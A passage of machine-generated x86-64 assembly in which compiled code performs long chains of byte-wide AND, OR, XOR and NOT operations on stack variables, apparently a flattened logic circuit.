kill: def $al killed $al killed $eax movb %al, -24(%rbp) movzbl -571(%rbp), %eax movzbl -289(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -288(%rbp) movzbl -521(%rbp), %eax movzbl -652(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -653(%rbp) movzbl -257(%rbp), %eax movzbl -367(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -100(%rbp) movzbl -853(%rbp), %eax movzbl -1082(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1063(%rbp) movzbl -120(%rbp), %eax movzbl -121(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -118(%rbp) movzbl -1217(%rbp), %eax movzbl -338(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -122(%rbp) movzbl -643(%rbp), %eax movzbl -644(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -645(%rbp) movzbl -973(%rbp), %eax movzbl -640(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -641(%rbp) movzbl -334(%rbp), %eax movzbl -335(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -336(%rbp) movzbl -1215(%rbp), %eax movzbl -708(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -332(%rbp) movzbl -1238(%rbp), %eax movzbl -332(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -167(%rbp) movzbl -1224(%rbp), %eax xorl $-1, %eax movzbl -370(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1237(%rbp) movzbl -1107(%rbp), %eax movzbl -210(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -710(%rbp) movzbl -246(%rbp), %eax xorl $-1, %eax movzbl -1138(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1124(%rbp) movzbl -996(%rbp), %eax xorl $-1, %eax movzbl -981(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -988(%rbp) movzbl -828(%rbp), %eax movzbl -87(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1165(%rbp) movzbl -811(%rbp), %eax xorl $-1, %eax movzbl -1174(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1162(%rbp) movzbl -943(%rbp), %eax movzbl -1075(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -551(%rbp) movzbl -686(%rbp), %eax xorl $-1, %eax movzbl -321(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -285(%rbp) movzbl -414(%rbp), %eax movzbl -1141(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -37(%rbp) movzbl -731(%rbp), %eax xorl $-1, %eax movzbl -203(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -206(%rbp) movzbl -108(%rbp), %eax movzbl -575(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -919(%rbp) movzbl -23(%rbp), %eax xorl $-1, %eax movzbl -28(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -27(%rbp) movzbl -636(%rbp), %eax movzbl -24(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -292(%rbp) movzbl -35(%rbp), %eax xorl $-1, %eax movzbl -288(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -291(%rbp) movzbl -520(%rbp), %eax movzbl -653(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -602(%rbp) movzbl -1065(%rbp), %eax xorl $-1, %eax movzbl -100(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -99(%rbp) movzbl -852(%rbp), %eax movzbl -1063(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -115(%rbp) movzbl -123(%rbp), %eax xorl $-1, %eax movzbl -118(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -119(%rbp) movzbl -1216(%rbp), %eax movzbl -122(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -513(%rbp) movzbl -642(%rbp), %eax xorl $-1, %eax movzbl -645(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -646(%rbp) movzbl -974(%rbp), %eax movzbl -641(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -980(%rbp) movzbl -333(%rbp), %eax xorl $-1, %eax movzbl -336(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -337(%rbp) movzbl -332(%rbp), %eax movzbl -337(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -184(%rbp) movzbl -1238(%rbp), %eax movzbl -337(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -529(%rbp) movzbl -210(%rbp), %eax movzbl -1237(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -484(%rbp) movzbl -210(%rbp), %eax movzbl -1237(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -707(%rbp) movzbl -1107(%rbp), %eax movzbl -1237(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -509(%rbp) movzbl -245(%rbp), %eax movzbl -1124(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1178(%rbp) movzbl -245(%rbp), %eax movzbl -1124(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -186(%rbp) movzbl -244(%rbp), %eax movzbl -1124(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -453(%rbp) movzbl -87(%rbp), %eax movzbl -988(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -989(%rbp) movzbl -87(%rbp), %eax movzbl -988(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1167(%rbp) movzbl -828(%rbp), %eax movzbl -988(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1166(%rbp) movzbl -1075(%rbp), %eax movzbl -1162(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -799(%rbp) movzbl -1075(%rbp), %eax movzbl -1162(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -274(%rbp) movzbl -943(%rbp), %eax movzbl -1162(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -269(%rbp) movzbl -1141(%rbp), %eax movzbl -285(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -287(%rbp) movzbl -1141(%rbp), %eax movzbl -285(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -41(%rbp) movzbl -414(%rbp), %eax movzbl -285(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -42(%rbp) movzbl -575(%rbp), %eax movzbl -206(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -773(%rbp) movzbl -575(%rbp), %eax movzbl -206(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -382(%rbp) movzbl -108(%rbp), %eax movzbl -206(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -372(%rbp) movzbl -24(%rbp), %eax movzbl -27(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -30(%rbp) movzbl -24(%rbp), %eax movzbl -27(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1127(%rbp) movzbl -636(%rbp), %eax movzbl -27(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -553(%rbp) movzbl -653(%rbp), %eax movzbl -291(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -290(%rbp) movzbl -653(%rbp), %eax movzbl -291(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -608(%rbp) movzbl -520(%rbp), %eax movzbl -291(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -600(%rbp) movzbl -1063(%rbp), %eax movzbl -99(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -599(%rbp) movzbl -1063(%rbp), %eax movzbl -99(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1025(%rbp) movzbl -852(%rbp), %eax movzbl -99(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -114(%rbp) movzbl -122(%rbp), %eax movzbl -119(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -116(%rbp) movzbl -122(%rbp), %eax movzbl -119(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -556(%rbp) movzbl -1216(%rbp), %eax movzbl -119(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -512(%rbp) movzbl -641(%rbp), %eax movzbl -646(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -647(%rbp) movzbl -641(%rbp), %eax movzbl -646(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -748(%rbp) movzbl -974(%rbp), %eax movzbl -646(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -983(%rbp) movzbl -332(%rbp), %eax movzbl -337(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -669(%rbp) movzbl -828(%rbp), %eax movzbl -989(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -44(%rbp) movzbl -167(%rbp), %eax movzbl -184(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -573(%rbp) movzbl -1107(%rbp), %eax movzbl -484(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -613(%rbp) movzbl -710(%rbp), %eax movzbl -707(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -495(%rbp) movzbl -244(%rbp), %eax movzbl -1178(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -690(%rbp) movzbl -417(%rbp), %eax movzbl -186(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -984(%rbp) movzbl -1166(%rbp), %eax movzbl -1167(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1168(%rbp) movzbl -943(%rbp), %eax movzbl -799(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1164(%rbp) movzbl -269(%rbp), %eax movzbl -274(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -940(%rbp) movzbl -414(%rbp), %eax movzbl -287(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -293(%rbp) movzbl -42(%rbp), %eax movzbl -41(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -949(%rbp) movzbl -108(%rbp), %eax movzbl -773(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -39(%rbp) movzbl -372(%rbp), %eax movzbl -382(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -383(%rbp) movzbl -636(%rbp), %eax movzbl -30(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -29(%rbp) movzbl -553(%rbp), %eax movzbl -1127(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -499(%rbp) movzbl -520(%rbp), %eax movzbl -290(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -369(%rbp) movzbl -600(%rbp), %eax movzbl -608(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -604(%rbp) movzbl -852(%rbp), %eax movzbl -599(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -597(%rbp) movzbl -115(%rbp), %eax movzbl -1025(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1024(%rbp) movzbl -1216(%rbp), %eax movzbl -116(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -117(%rbp) movzbl -513(%rbp), %eax movzbl -556(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -560(%rbp) movzbl -974(%rbp), %eax movzbl -647(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -648(%rbp) movzbl -980(%rbp), %eax movzbl -748(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -740(%rbp) movzbl -1238(%rbp), %eax movzbl -669(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -970(%rbp) movzbl -10(%rbp), %eax movzbl -970(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -568(%rbp) movzbl -529(%rbp), %eax xorl $-1, %eax movzbl -573(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -572(%rbp) movzbl -1100(%rbp), %eax movzbl -613(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1058(%rbp) movzbl -509(%rbp), %eax xorl $-1, %eax movzbl -495(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -183(%rbp) movzbl -1144(%rbp), %eax movzbl -690(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -191(%rbp) movzbl -453(%rbp), %eax xorl $-1, %eax movzbl -984(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -221(%rbp) movzbl -1165(%rbp), %eax xorl $-1, %eax movzbl -1168(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1169(%rbp) movzbl -623(%rbp), %eax movzbl -1164(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -286(%rbp) movzbl -551(%rbp), %eax xorl $-1, %eax movzbl -940(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -284(%rbp) movzbl -621(%rbp), %eax movzbl -293(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -795(%rbp) movzbl -37(%rbp), %eax xorl $-1, %eax movzbl -949(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -950(%rbp) movzbl -103(%rbp), %eax movzbl -39(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -946(%rbp) movzbl -919(%rbp), %eax xorl $-1, %eax movzbl -383(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -380(%rbp) movzbl -635(%rbp), %eax movzbl -29(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -736(%rbp) movzbl -292(%rbp), %eax xorl $-1, %eax movzbl -499(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -961(%rbp) movzbl -523(%rbp), %eax movzbl -369(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -222(%rbp) movzbl -602(%rbp), %eax xorl $-1, %eax movzbl -604(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -620(%rbp) movzbl -866(%rbp), %eax movzbl -597(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1019(%rbp) movzbl -114(%rbp), %eax xorl $-1, %eax movzbl -1024(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1087(%rbp) movzbl -1219(%rbp), %eax movzbl -117(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -535(%rbp) movzbl -512(%rbp), %eax xorl $-1, %eax movzbl -560(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -552(%rbp) movzbl -978(%rbp), %eax movzbl -648(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -583(%rbp) movzbl -983(%rbp), %eax xorl $-1, %eax movzbl -740(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -998(%rbp) movzbl -970(%rbp), %eax movzbl -998(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -31(%rbp) movzbl -10(%rbp), %eax movzbl -998(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -569(%rbp) movzbl -613(%rbp), %eax movzbl -572(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -48(%rbp) movzbl -613(%rbp), %eax movzbl -572(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -385(%rbp) movzbl -1100(%rbp), %eax movzbl -572(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1055(%rbp) movzbl -1144(%rbp), %eax movzbl -183(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1060(%rbp) movzbl -1144(%rbp), %eax movzbl -183(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1171(%rbp) movzbl -690(%rbp), %eax movzbl -183(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1161(%rbp) movzbl -761(%rbp), %eax movzbl -221(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1156(%rbp) movzbl -761(%rbp), %eax movzbl -221(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -883(%rbp) movzbl -763(%rbp), %eax movzbl -221(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -230(%rbp) movzbl -1164(%rbp), %eax movzbl -1169(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -834(%rbp) movzbl -1164(%rbp), %eax movzbl -1169(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -488(%rbp) movzbl -623(%rbp), %eax movzbl -1169(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -617(%rbp) movzbl -293(%rbp), %eax movzbl -284(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -616(%rbp) movzbl -293(%rbp), %eax movzbl -284(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -800(%rbp) movzbl -621(%rbp), %eax movzbl -284(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -796(%rbp) movzbl -39(%rbp), %eax movzbl -950(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -790(%rbp) movzbl -39(%rbp), %eax movzbl -950(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -377(%rbp) movzbl -103(%rbp), %eax movzbl -950(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -376(%rbp) movzbl -29(%rbp), %eax movzbl -380(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -381(%rbp) movzbl -29(%rbp), %eax movzbl -380(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -904(%rbp) movzbl -635(%rbp), %eax movzbl -380(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -743(%rbp) movzbl -369(%rbp), %eax movzbl -961(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -689(%rbp) movzbl -369(%rbp), %eax movzbl -961(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -216(%rbp) movzbl -523(%rbp), %eax movzbl -961(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -937(%rbp) movzbl -597(%rbp), %eax movzbl -620(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -614(%rbp) movzbl -597(%rbp), %eax movzbl -620(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1018(%rbp) movzbl -866(%rbp), %eax movzbl -620(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1016(%rbp) movzbl -117(%rbp), %eax movzbl -1087(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1014(%rbp) movzbl -117(%rbp), %eax movzbl -1087(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1159(%rbp) movzbl -1219(%rbp), %eax movzbl -1087(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -550(%rbp) movzbl -648(%rbp), %eax movzbl -552(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -554(%rbp) movzbl -648(%rbp), %eax movzbl -552(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -304(%rbp) movzbl -978(%rbp), %eax movzbl -552(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -907(%rbp) movzbl -970(%rbp), %eax movzbl -998(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -759(%rbp) movzbl -623(%rbp), %eax movzbl -834(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -225(%rbp) movzbl -568(%rbp), %eax movzbl -31(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -9(%rbp) movzbl -1100(%rbp), %eax movzbl -48(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -570(%rbp) movzbl -1058(%rbp), %eax movzbl -385(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -395(%rbp) movzbl -690(%rbp), %eax movzbl -1060(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1064(%rbp) movzbl -191(%rbp), %eax movzbl -1171(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -189(%rbp) movzbl -763(%rbp), %eax movzbl -1156(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1158(%rbp) movzbl -971(%rbp), %eax movzbl -883(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -882(%rbp) movzbl -617(%rbp), %eax movzbl -488(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -619(%rbp) movzbl -621(%rbp), %eax movzbl -616(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -615(%rbp) movzbl -796(%rbp), %eax movzbl -800(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -802(%rbp) movzbl -103(%rbp), %eax movzbl -790(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -792(%rbp) movzbl -376(%rbp), %eax movzbl -377(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -449(%rbp) movzbl -635(%rbp), %eax movzbl -381(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -942(%rbp) movzbl -743(%rbp), %eax movzbl -904(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -625(%rbp) movzbl -523(%rbp), %eax movzbl -689(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -730(%rbp) movzbl -937(%rbp), %eax movzbl -216(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -913(%rbp) movzbl -866(%rbp), %eax movzbl -614(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -463(%rbp) movzbl -1019(%rbp), %eax movzbl -1018(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -193(%rbp) movzbl -1219(%rbp), %eax movzbl -1014(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -130(%rbp) movzbl -535(%rbp), %eax movzbl -1159(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1076(%rbp) movzbl -978(%rbp), %eax movzbl -554(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -140(%rbp) movzbl -583(%rbp), %eax movzbl -304(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -411(%rbp) movzbl -10(%rbp), %eax movzbl -759(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -987(%rbp) movzbl -420(%rbp), %eax movzbl -987(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -609(%rbp) movzbl -569(%rbp), %eax xorl $-1, %eax movzbl -9(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1170(%rbp) movzbl -783(%rbp), %eax movzbl -570(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -346(%rbp) movzbl -1055(%rbp), %eax xorl $-1, %eax movzbl -395(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1066(%rbp) movzbl -247(%rbp), %eax movzbl -1064(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -134(%rbp) movzbl -1161(%rbp), %eax xorl $-1, %eax movzbl -189(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -97(%rbp) movzbl -764(%rbp), %eax movzbl -1158(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -888(%rbp) movzbl -230(%rbp), %eax xorl $-1, %eax movzbl -882(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1067(%rbp) movzbl -286(%rbp), %eax xorl $-1, %eax movzbl -619(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -670(%rbp) movzbl -622(%rbp), %eax movzbl -615(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: 